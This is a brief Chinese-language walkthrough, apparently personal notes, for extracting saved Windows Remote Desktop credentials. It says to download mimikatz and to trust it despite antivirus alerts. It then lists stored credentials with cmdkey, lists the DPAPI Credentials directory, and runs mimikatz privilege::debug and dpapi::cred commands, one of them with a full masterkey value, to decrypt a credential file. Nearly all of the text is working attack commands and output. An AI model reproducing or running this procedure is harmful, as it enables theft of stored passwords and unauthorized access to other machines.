下载
#会报毒 请信任
https://github.com/ParrotSec/mimikatz
在cmd执行:
#查看是否有保存的凭据密码信息.
cmdkey /list
目标: LegacyGeneric:target=TERMSRV/172.16.0.108
类型: 普通
用户: sre
本地机器持续时间
#查看保存凭据的目录和凭据的值
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
C:\Users\sre>dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
驱动器 C 中的卷是 os
卷的序列号是 761D-F340
C:\Users\sre\AppData\Local\Microsoft\Credentials 的目录
2022/07/21 周四 14:03 <DIR> .
2022/07/21 周四 14:03 <DIR> ..
2022/05/31 周二 17:43 418 3CAA5CFEBA159D5E80B2ED2906C83F4F
2022/08/10 周三 12:11 482 4753865B92CD3B5843262950D6E9C157
2022/04/25 周一 21:25 418 53570B44DCAA1889EDA0B445B6040228
2022/05/07 周六 11:04 418 7D343176CDBDE64D09EBAFB58702269E
2022/06/22 周三 10:50 498 A2A4DE3D3A094A2230DFD1A1F31B4D91
2022/04/27 周三 17:25 466 BF79E68DD4C78FB8BE8B2C6D69CFBEA7
2022/07/21 周四 14:03 434 D0FDC9E448BE01A501D703F707D9DB0A
2022/07/17 周日 21:14 11,506 DFBE70A7E5CC19A398EBF1B96859CE5D
2022/05/18 周三 17:00 418 E4C06FE94F857E7541110382EDAC1D21
9 个文件 15,058 字节
2 个目录 73,410,961,408 可用字节
在mimikatz执行:
privilege::debug
dpapi::cred /in:C:\Users\sre\AppData\Local\Microsoft\Credentials\3CAA5CFEBA159D5E80B2ED2906C83F4F #get masterkey
dpapi::cred /in:C:\Users\sre\AppData\Local\Microsoft\Credentials\3CAA5CFEBA159D5E80B2ED2906C83F4F /masterkey:51d3ab5aad2aa540e94b8839d5c8b3d22390ade32a51cbdfe903aa4897bcd65ac3801c06bf6e1f0874b326a991b6c186a85604844193f31573f18bab92a61be5